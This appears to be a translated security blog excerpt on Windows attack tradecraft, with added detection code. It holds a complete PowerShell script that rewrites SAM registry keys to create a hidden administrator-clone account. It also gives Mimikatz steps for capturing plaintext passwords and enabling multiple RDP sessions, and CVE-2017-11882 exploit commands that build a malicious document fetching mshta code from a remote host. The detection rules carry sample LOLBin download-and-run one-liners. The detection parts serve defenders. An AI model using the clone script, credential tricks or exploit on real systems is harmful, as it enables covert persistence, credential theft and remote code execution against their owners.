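    Every one-liner in this post and in the "Some Tricks" post above leaves a recognisable process command line, which is what a detection engineer turns it into. The Python below is an added example, not code from the original posts: detection logic, not tradecraft. Each rule is a regular expression over the full command line as it appears in a Windows 4688 event with command-line auditing enabled or in a Sysmon event 1; the technique labels are chosen here, and the log lines at the bottom are constructed samples in an assumed "timestamp host user=… cmd=…" layout, built from the commands on this page.

```python
"""Classify process command lines against the remote-execution one-liners collected above.

Added example (not from the original posts). Rules are ordered; classify()
returns every label that fires so a chained command (download, run, purge the
certutil cache) reports each stage.
"""
import re

RULES = [
    ("regsvr32 scriptlet (squiblydoo)", r"\bregsvr32(\.exe)?\b.*\s/i:\S*https?://"),
    ("mshta remote/inline script",     r'\bmshta(\.exe)?\s+"?(https?://|javascript:|vbscript:)'),
    ("rundll32 javascript:",           r'\brundll32(\.exe)?\s+"?javascript:'),
    # a URL followed by an output name is a download; "... <url> delete" is the cache purge
    ("certutil download",              r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://\S+\s+(?!delete\b)\S+"),
    ("certutil cache purge",           r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bdelete\b"),
    ("bitsadmin download",             r"\bbitsadmin(\.exe)?\b.*/transfer\b"),
    ("msiexec remote package",         r'\bmsiexec(\.exe)?\b.*\s/i\s+"?https?://'),
    ("msxsl stylesheet script",        r"\bmsxsl(\.exe)?\s+\S"),   # msxsl is not a Windows component
    ("pubprn.vbs sct",                 r"\bpubprn\.vbs\b.*\bscript:"),
    ("powershell download cradle",     r"\bpowershell(\.exe)?\b.*(DownloadString|DownloadFile|\bIEX\b|Invoke-Expression)"),
    ("IEExec remote assembly",         r'\bieexec(\.exe)?\s+"?https?://'),
    ("python inline download",         r"\bpython(\d(\.\d+)?|\.exe)?\b.*\s-c\s.*urlopen"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]


def classify(command_line: str):
    """Names of every rule the command line trips, in RULES order (empty list = nothing matched)."""
    return [name for name, rx in COMPILED if rx.search(command_line)]


LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def scan_log(lines):
    """Parse 'ts host user=... cmd=...' lines; return [(ts, host, user, [techniques])] for hits only."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        techniques = classify(m.group("cmd"))
        if techniques:
            hits.append((m.group("ts"), m.group("host"), m.group("user"), techniques))
    return hits


SAMPLE_LOG = [  # constructed sample events; the commands are the ones listed in the post
    "2017-11-21T03:00:01Z ws01 user=alice cmd=notepad.exe C:\\Users\\alice\\notes.txt",
    "2017-11-21T03:00:07Z ws01 user=alice cmd=regsvr32 /u /s /i:http://site.com/js.png scrobj.dll",
    "2017-11-21T03:00:09Z ws01 user=alice cmd=mshta http://site.com/calc.hta",
    "2017-11-21T03:00:12Z ws02 user=bob cmd=certutil -urlcache -split -f http://192.168.254.102:80/a a.exe"
    " && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete",
    "2017-11-21T03:00:15Z ws02 user=bob cmd=msiexec /q /i http://site.com/payloads/calc.png",
]

if __name__ == "__main__":
    for ts, host, user, techniques in scan_log(SAMPLE_LOG):
        print(ts, host, user, ", ".join(techniques))
```

    The rules key on the argument shapes rather than on the binary alone, so an administrator running certutil against a local file or msiexec against a local package is not flagged; conversely, a renamed copy of a binary evades them, which is the usual reason to pair command-line rules with hash or original-filename checks.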


    While testing recently I found that on Windows Server 2012 Mimikatz cannot dump plaintext passwords directly, and that an account created the usual way sometimes hits this problem at logon:
    (figure: 1.jpg)

    ps: to dump plaintext on 2012, "UseLogonCredential" under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest has to be set to 1 (type DWORD 32-bit), and the plaintext is only captured the next time the user logs on.

    Later I found that the old way of creating a clone account lets the new account log on to the system. For convenience I put together a PowerShell script that automatically changes the permissions on the registry keys (it must be run with administrator privileges, i.e. after a UAC bypass) and then performs the operation. The code:

    function Create-Clone
    {
    <#
    .SYNOPSIS
    This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
    .PARAMETER u
    The clone username
    .PARAMETER p
    The clone user's password
    .PARAMETER cu
    The user to clone, default administrator
    .EXAMPLE
    Create-Clone -u evi1cg -p evi1cg123 -cu administrator
    #>
        Param(
            [Parameter(Mandatory=$true)]
            [String]
            $u,
    
            [Parameter(Mandatory=$true)]
            [String]
            $p,
    
            [Parameter(Mandatory=$false)]
            [String]
            $cu = "administrator"
        )
        function upReg{
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17] >> $env:temp\up.ini"
            cmd /c "regini $env:temp\up.ini"
            Remove-Item $env:temp\up.ini
    
        }
        function downreg {
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17] >> $env:temp\down.ini"
            cmd /c "regini $env:temp\down.ini"
            Remove-Item $env:temp\down.ini
        }
        function Create-user ([string]$Username,[string]$Password) {
            $group = "Administrators"
            $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
            if (!$existing) {
                Write-Host "[*] Creating new local user $Username with password $Password"
                & NET USER $Username $Password /add /y /expires:never | Out-Null
                Write-Host "[*] Adding local user $Username to $group."
                & NET LOCALGROUP $group $Username /add | Out-Null
    
            }
            else {
                $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
                $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
                Write-Host "[*] Setting password for existing local user $Username"
                $exist.SetPassword($Password)
            }
    
            Write-Host "[*] Ensuring password for $Username never expires."
            & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE   | Out-Null
        }
        function GetUser-Key([string]$user)
        {
            if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
                cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
                $file = Get-Content "$env:temp\$user.reg"  | Out-String
                $pattern="@=hex\((.*?)\)\:"
                $file -match $pattern |Out-Null
                $key = "00000"+$matches[1]
                Write-Host "[!]"$key
                return $key
            }else {
                Write-Host "[-] SomeThing Wrong !"
            }
    
        }
        function Clone ([string]$ukey,[string]$cukey) {
            $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
            $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
            Write-Host "[*] Get clone user'F value"
            $cuFreg = Get-Item -Path $cureg.Trim()
            $cuFvalue = $cuFreg.GetValue('F')
            Write-Host "[*] Change user'F value"
            Set-ItemProperty -path $ureg.Trim()  -Name "F" -value $cuFvalue
            $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
            cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
        }
        function Main () {
            Write-Output "[*] Start"
            Write-Output "[*] Tring to change reg privilege !"
            upReg
            if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
                Write-Host "[-] The User to Clone does not exist"
                Write-Output "[*] Change reg privilege back !"
                downReg
                Write-Output "[*] Exiting !"
            }
            else {
                if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
                    $tmp = "1"
                }
                else{
                    $tmp = "0"
                }
                Write-Output "[*] Create User..."
                Create-user $u $p
                Write-Output "[*] Get User $u's  Key .."
                $ukey = GetUser-Key $u |Out-String
                Write-Output "[*] Get User $cu's  Key .."
                $cukey = GetUser-Key $cu |Out-String
                Write-Output "[*] Clone User.."
                Clone $ukey $cukey
                if($tmp -eq 1 ){
                    Write-Output "[*] Delete User.."
                    cmd /c "net User $u /del " |Out-Null
                }else{ Write-Output "[*] Don't need to delete.."}
                cmd /c "regedit /s $env:temp\$u.reg"
                cmd /c "regedit /s $env:temp\out.reg"
                Remove-Item $env:temp\*.reg
                Write-Output "[*] Change reg privilege back !"
                downreg
                Write-Output "[*] Done"
            }
        }
        Main
    }
    

    GITHUB:

    After the account is created, it can log on to the system:

    (figure: 2.jpg)

    Tested on Win7:

    (demo)

    This can of course be combined with the following trick to allow multiple users to log on at once.

    With mimikatz.exe, run ts::multirdp to allow multiple concurrent remote logons.

    ps: this stops working after a reboot; run ts::multirdp again next time, or patch termsrv.dll for a permanent change.
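    The detection for the clone technique above, as an added example that is not code from the original post: each HKLM\SAM\SAM\Domains\Account\Users\<RID> key is named after the account's RID in hex, and the same RID is stored inside the key's F value at offset 0x30 (the layout assumed here is chntpw's user_F, with the account-control flags at 0x38). The script copies the administrator's F into the new user's key, so the embedded RID (500) no longer agrees with the key name, and that mismatch is what the checker looks for in a regedit /e export of the Users key. The export text at the bottom is constructed, with synthetic F blobs, not taken from a real system.

```python
"""Spot cloned local accounts in a regedit export of the SAM Users keys.

Added example (not from the original post). Offsets follow chntpw's user_F
structure; only the RID and flag fields are used here.
"""
import re
import struct

RID_OFFSET = 0x30       # 4-byte little-endian RID inside F
FLAGS_OFFSET = 0x38     # 2-byte ACB flags inside F
ACB_DISABLED = 0x0001

KEY_RE = re.compile(r"^\[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\([0-9A-Fa-f]{8})\]$")
VALUE_RE = re.compile(r'^"(F|V)"=hex:(.*)$')


def parse_users_export(text: str):
    """{key_name: {"F": bytes, "V": bytes}} from 'regedit /e' output (handles line continuations)."""
    users, key, pending = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:                        # continuation of a wrapped hex value
            name, chunks = pending
            chunks.append(line.rstrip("\\"))
            if not line.endswith("\\"):
                users[key][name] = bytes.fromhex("".join(chunks).replace(",", ""))
                pending = None
            continue
        if line.startswith("["):
            m = KEY_RE.match(line)
            key = m.group(1).upper() if m else None    # Names\* and other keys are ignored
            if key:
                users.setdefault(key, {})
            continue
        m = VALUE_RE.match(line)
        if m and key:
            name, rest = m.group(1), m.group(2)
            if rest.endswith("\\"):
                pending = (name, [rest.rstrip("\\")])
            else:
                users[key][name] = bytes.fromhex(rest.replace(",", ""))
    return users


def rid_in_f(f: bytes) -> int:
    return struct.unpack_from("<I", f, RID_OFFSET)[0]


def account_disabled(f: bytes) -> bool:
    return bool(struct.unpack_from("<H", f, FLAGS_OFFSET)[0] & ACB_DISABLED)


def find_clones(users):
    """[(key_name, rid_embedded_in_F)] for every account whose F does not belong to its own RID."""
    clones = []
    for key, values in sorted(users.items()):
        f = values.get("F")
        if f is None or len(f) < FLAGS_OFFSET + 2:
            continue
        if rid_in_f(f) != int(key, 16):
            clones.append((key, rid_in_f(f)))
    return clones


def make_f(rid: int, flags: int = 0x0210) -> bytes:
    """Synthetic 0x50-byte F value with only RID and flags populated (test data)."""
    f = bytearray(0x50)
    struct.pack_into("<I", f, RID_OFFSET, rid)
    struct.pack_into("<H", f, FLAGS_OFFSET, flags)
    return bytes(f)


def reg_hex(blob: bytes, per_line: int = 25) -> str:
    """Format bytes the way regedit does: comma separated, wrapped with a trailing backslash."""
    parts = ["%02x" % b for b in blob]
    lines = [",".join(parts[i:i + per_line]) for i in range(0, len(parts), per_line)]
    return ",\\\r\n  ".join(lines)


SAMPLE_EXPORT = (   # constructed: Administrator (0x1F4) plus a cloned user key 0x3EF
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4]\r\n"
    '"F"=hex:' + reg_hex(make_f(500)) + "\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003EF]\r\n"
    '"F"=hex:' + reg_hex(make_f(500)) + "\r\n"          # key says 0x3EF, F says 500
    '"V"=hex:00,00,00,00\r\n\r\n'
    "[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\evi1cg]\r\n"
    "@=hex(3ef):\r\n"
)

if __name__ == "__main__":
    for key, rid in find_clones(parse_users_export(SAMPLE_EXPORT)):
        print("key %s carries the F value of RID %d" % (key, rid))
```

    On a live host the export needs the same SAM key permissions the script grants with regini, so this is easier to run offline against a saved hive export; a mismatch is a strong signal because nothing in normal account management rewrites F with another account's RID.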


  • 11/20/17--21:32: Exploiting CVE-2017-11882
    CVE-2017-11882 has been quite hot lately. For background on the vulnerability see: 隐藏17年的Office远程代码执行漏洞POC样本分析(CVE-2017-11882) (Analysis of a POC sample for the Office remote code execution vulnerability that hid for 17 years).

    Today on Twitter someone shared a POC (Twitter link, POC link), and later someone shared the project CVE-2017-11882. A quick look at that project shows it achieves command execution by modifying an RTF file, but it has a drawback: it uses WebDAV to execute a remote file, which is not always convenient. So I made some simple changes to the file; the project is at GITHUB:
    Usage is simple. To execute a command:

    python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    

    (demo)
    (demo)

    For further exploitation see my earlier post 《windows命令执行漏洞不会玩? 看我!》 (Don't know what to do with a Windows command-execution bug? Look here!). Because of the length limit on the command, mshta can be used to do the execution. The constructed command:

    python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
    

    Final result:
    (figure: 1.gif)